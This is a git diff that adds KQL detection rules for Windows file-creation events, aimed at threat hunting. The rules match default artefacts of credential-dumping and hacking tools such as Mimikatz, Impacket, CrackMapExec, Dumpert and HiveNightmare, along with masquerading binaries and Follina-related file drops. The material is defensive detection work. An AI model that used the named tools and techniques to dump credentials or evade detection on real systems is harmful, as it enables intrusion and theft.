new file mode 100644
index 00000000..e03bf1a6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql
@@ -0,0 +1,12 @@
+// Title: Dynamic CSharp Compile Artefact
+// Author: frack113
+// Date: 2022-01-09
+// Level: low
+// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
+// Certain processes are not typically observed compiling C# code, but can do so without touching disk.
+// This can be used to unpack a payload for execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+
+DeviceFileEvents
+| where FolderPath endswith ".cmdline"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql b/KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql
new file mode 100644
index 00000000..2d878958
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql
@@ -0,0 +1,15 @@
+// Title: EVTX Created In Uncommon Location
+// Author: D3F7A5105
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
+// This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
+// Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+//   - Administrator or backup activity
+//   - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "<log_name">_<uuid>.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files
+
+DeviceFileEvents
+| where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql b/KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql
new file mode 100644
index 00000000..676a4a8b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Creation In Suspicious Directory By Msdt.EXE
+// Author: Vadim Varganov, Florian Roth (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, cve.2022-30190
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql b/KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql
new file mode 100644
index 00000000..3b10723c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql
@@ -0,0 +1,10 @@
+// Title: File With Uncommon Extension Created By An Office Application
+// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the creation of files with an executable or script extension by an Office application.
+// MITRE Tactic: Execution
+// Tags: attack.t1204.002, attack.execution
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not((((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\BackstageInAppNavCache\\") and FolderPath endswith ".com") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql
new file mode 100644
index 00000000..cc19cbbc
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql
@@ -0,0 +1,13 @@
+// Title: Files With System DLL Name In Unsuspected Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-24
+// Level: medium
+// Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.).
+// It is highly recommended to perform an initial baseline before using this rule in production.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+//   - Third party software might bundle specific versions of system DLLs.
+
+DeviceFileEvents
+| where (FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\tdh.dll") and (not((FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql
new file mode 100644
index 00000000..2867167c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql
@@ -0,0 +1,14 @@
+// Title: Files With System Process Name In Unsuspected Locations
+// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-26
+// Level: medium
+// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).
+// It is highly recommended to perform an initial baseline before using this rule in production.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+//   - System processes copied outside their default folders for testing purposes
+//   - Third party software naming their software with the same names as the processes mentioned here
+
+DeviceFileEvents
+| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or ((InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and FolderPath startswith "C:\\Windows\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\SysWOW64\\wuauclt.exe", "C:\\Windows\\UUS\\arm64\\wuaucltcore.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql b/KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql
new file mode 100644
index 00000000..abb5b837
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql
@@ -0,0 +1,10 @@
+// Title: GatherNetworkInfo.VBS Reconnaissance Script Output
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql b/KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql
new file mode 100644
index 00000000..68d12ee8
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql
@@ -0,0 +1,14 @@
+// Title: GoToAssist Temporary Installation Artefact
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\LogMeInInc\\GoToAssist Remote Support Expert\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql
new file mode 100644
index 00000000..44253237
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-11
+// Level: high
+// Description: Detects file creation events with filename patterns used by CrackMapExec.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql b/KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql
new file mode 100644
index 00000000..9c78eb72
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Dumpert Process Dumper Default File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-02-04
+// Level: critical
+// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Very unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "dumpert.dmp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql
new file mode 100644
index 00000000..677c2742
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Impacket File Indicators
+// Author: The DFIR Report, IrishDeath
+// Date: 2025-05-19
+// Level: high
+// Description: Detects file creation events with filename patterns used by Impacket.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where FolderPath matches regex "\\\\sessionresume_[a-zA-Z]{8}$"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql b/KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql
new file mode 100644
index 00000000..fbb12d87
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Inveigh Execution Artefacts
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-24
+// Level: critical
+// Description: Detects the presence and execution of Inveigh via dropped artefacts
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\Inveigh-Log.txt" or FolderPath endswith "\\Inveigh-Cleartext.txt" or FolderPath endswith "\\Inveigh-NTLMv1Users.txt" or FolderPath endswith "\\Inveigh-NTLMv2Users.txt" or FolderPath endswith "\\Inveigh-NTLMv1.txt" or FolderPath endswith "\\Inveigh-NTLMv2.txt" or FolderPath endswith "\\Inveigh-FormInput.txt" or FolderPath endswith "\\Inveigh.dll" or FolderPath endswith "\\Inveigh.exe" or FolderPath endswith "\\Inveigh.ps1" or FolderPath endswith "\\Inveigh-Relay.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql b/KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql
new file mode 100644
index 00000000..b4b1fb24
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Mimikatz Kirbi File Creation
+// Author: Florian Roth (Nextron Systems), David ANDRE
+// Date: 2021-11-08
+// Level: critical
+// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql b/KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql
new file mode 100644
index 00000000..c040e029
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - NPPSpy Hacktool Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-29
+// Level: high
+// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+
+DeviceFileEvents
+| where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql b/KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
new file mode 100644
index 00000000..c0800897
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
+// Author: SecurityAura
+// Date: 2022-11-16
+// Level: high
+// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql
new file mode 100644
index 00000000..4a003dab
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql
@@ -0,0 +1,14 @@
+// Title: HackTool - Powerup Write Hijack DLL
+// Author: Subhash Popuri (@pbssubhash)
+// Date: 2021-08-21
+// Level: high
+// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
+// In it's default mode, it builds a self deleting .bat file which executes malicious command.
+// The detection rule relies on creation of the malicious bat file (debug.bat by default).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Any powershell script that creates bat files
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql b/KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql
new file mode 100644
index 00000000..37d91a8b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - QuarksPwDump Dump File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-10
+// Level: critical
+// Description: Detects a dump file written by QuarksPwDump password dumper
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
new file mode 100644
index 00000000..77484182
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-27
+// Level: high
+// Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ":\\windows\\temp\\sam.tmp" or FolderPath endswith ":\\windows\\temp\\sec.tmp" or FolderPath endswith ":\\windows\\temp\\sys.tmp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql b/KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql
new file mode 100644
index 00000000..9b37a669
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SafetyKatz Dump Indicator
+// Author: Markus Neis
+// Date: 2018-07-24
+// Level: high
+// Description: Detects default lsass dump filename generated by SafetyKatz.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Rare legitimate files with similar filename structure
+
+DeviceFileEvents
+| where FolderPath endswith "\\Temp\\debug.bin"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql b/KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql
new file mode 100644
index 00000000..16e14045
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Typical HiveNightmare SAM File Export
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-23
+// Level: high
+// Description: Detects files written by the different tools that exploit HiveNightmare
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, cve.2021-36934
+// False Positives:
+//   - Files that accidentally contain these strings
+
+DeviceFileEvents
+| where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql b/KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql
new file mode 100644
index 00000000..120709f6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql
@@ -0,0 +1,12 @@
+// Title: Hijack Legit RDP Session to Move Laterally
+// Author: Samir Bousseaden
+// Date: 2019-02-21
+// Level: high
+// Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\mstsc.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql b/KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql
new file mode 100644
index 00000000..1d275f65
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql
@@ -0,0 +1,10 @@
+// Title: Installation of TeamViewer Desktop
+// Author: frack113
+// Date: 2022-01-28
+// Level: medium
+// Description: TeamViewer_Desktop.exe is create during install
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\TeamViewer_Desktop.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql b/KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql
new file mode 100644
index 00000000..c875e914
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql
@@ -0,0 +1,12 @@
+// Title: ISO File Created Within Temp Folders
+// Author: @sam0x90
+// Date: 2022-07-30
+// Level: high
+// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+//   - Potential FP by sysadmin opening a zip file containing a legitimate ISO file
+
+DeviceFileEvents
+| where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql
new file mode 100644
index 00000000..d2a1fb30
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql
@@ -0,0 +1,13 @@
+// Title: ISO or Image Mount Indicator in Recent Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: medium
+// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
+// This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+//   - Cases in which a user mounts an image file for legitimate reasons
+
+DeviceFileEvents
+| where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql
new file mode 100644
index 00000000..5f722cba
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Archive
+// Author: frack113, Florian Roth
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write an archive to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
